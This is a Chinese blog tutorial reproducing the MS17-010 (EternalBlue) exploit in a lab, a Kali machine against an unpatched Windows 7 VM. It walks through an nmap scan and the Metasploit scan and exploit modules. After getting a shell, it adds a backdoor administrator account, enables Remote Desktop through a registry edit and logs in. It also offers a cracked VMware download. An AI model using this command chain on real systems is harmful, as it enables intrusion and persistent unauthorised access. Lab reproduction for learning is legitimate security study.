漏洞复现 | MS17-010*(永恒之蓝)漏洞复现

MS17-010*(永恒之蓝)漏洞复现

目录

一、漏洞概述

1、漏洞介绍

2、漏洞原理

3、影响版本

二、实验条件

1、查看IP

2、测试主机网络连通性

三、漏洞复现

1、主机发现

2、使用MSF的永恒之蓝模块

3、使用MS17-010扫描模块,对靶机进行扫描

4、使用ms17-010攻击模块,对靶机进行攻击

5、得到靶机shell

6、对靶机shell进行控制

四、实验所用设备下载


一、漏洞概述

1、漏洞介绍

  • 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理

  • 永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本

  • 目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、实验条件

  • 靶机(win7):192.168.112.133

  • 攻击机(kali):192.168.112.128

  • 实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!

1、查看IP

  • 首先,开启kali和win7,查看两台主机的ip地址
  • kali:

  • win7

2、测试主机网络连通性

  • 由此得来,可以ping通,(如果ping不通,测试两边主机的网络连接和win7的防火墙)

三、漏洞复现

1、主机发现

  • 登录kali,使用nmap探测本网段主机

  • nmap 192.168.112.133/24        
  • 可得,目标主机开放了135、139、445、1688、3389端口

  • 而永恒之蓝利用的是445端口的SMB服务,操作系统溢出漏洞

2、使用MSF的永恒之蓝模块

  • 打开MSF

    • msfconsole        #启动msf
  • 搜索ms17-010 代码:

    • search ms17_010      #搜索ms17-010
  • 这里可以得到一些工具,其中

    • auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,

    • exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块

  • 一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

3、使用MS17-010扫描模块,对靶机进行扫描

  • use auxiliary/scanner/smb/smb_ms17_010
    #使用模块
  • set rhosts 192.168.112.133
    #设置目标ip或网段
  • 出现漏洞

4、使用ms17-010攻击模块,对靶机进行攻击

  • use exploit/windows/smb/ms17_010_eternalblue
    #使用模块进行攻击
  • set rhosts 192.168.112.133
    #设置目标ip
    • 小贴士:可以用以下代码查看设置选项

    • show options
  • 攻击完成

5、得到靶机shell

  • shell
  • 测试靶机连通性

    • 输入:chcp 65001 可有效解决乱码问题。

6、对靶机shell进行控制

  • 创建新用户

    • net user         #查看所有用户
      whoami /user     #查看当前用户的SID
      net user hacker 123456 /add
      #创建用户并设置密码"123456"
  • 将用户添加至管理员组

    • net localgroup administrators hacker /add
      #将用户添加至管理员组
  • 开启远程桌面功能

    • 查看3389端口状态

    • netstat -ano        #查看开放了哪些端口
      • 如图所示并没有开启

      • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 
        #开启3389端口
      • 已开启

  • 远程桌面链接靶机(命令要在kail下输入)

    • rdesktop 192.168.112.133:3389
      #通过3389端口开启远程桌面
    • 登陆成功

四、实验所用设备下载

  • windows7以及kali镜像文件、vmware16(附带破解)已放置在网盘链接中,请自行下载
  • 也可在评论区留言或私信我哦
  • 感谢支持!!!!!!!
  •  链接
    • 链接:https://pan.baidu.com/s/1n_elmgr3aKBKf6x-mK51Uw 
      
      提取码:gkkg 
      
      --来自百度网盘超级会员V3的分享

  • 12
    点赞
  • 50
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
学习永恒之蓝复现的收获包括以下几点: 首先,在复现过程中,你可以学习到如何利用已有的工具,例如Kali上的工具,来进行复现。这些工具已经为复现做好了准备,帮助你更好地理解攻击的过程和原理,并加深对Kali的使用。 其次,你还可以通过学习永恒之蓝漏洞的利用过程,了解到具体的漏洞利用方法和技巧。永恒之蓝是一种由美国国家安全局开发的漏洞利用程序,针对微软漏洞编号ms17-010。通过学习这个漏洞的利用工具,你可以更深入地了解TCP 445端口(文件分享协议)的攻击方式,以及如何传播病毒木马。 最后,学习永恒之蓝复现还可以帮助你加深对渗透攻击的理解。在复现过程中,你可能会接触到一些以前没见过的命令和技术,这有助于扩展你的知识面,并提升你在渗透测试领域的技能水平。 综上所述,学习永恒之蓝复现的收获包括对Kali工具的深入理解和熟练使用,对漏洞利用方法和技巧的学习,以及对渗透攻击的更深入理解和技能提升。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_54584489/article/details/122374341)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tokel

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值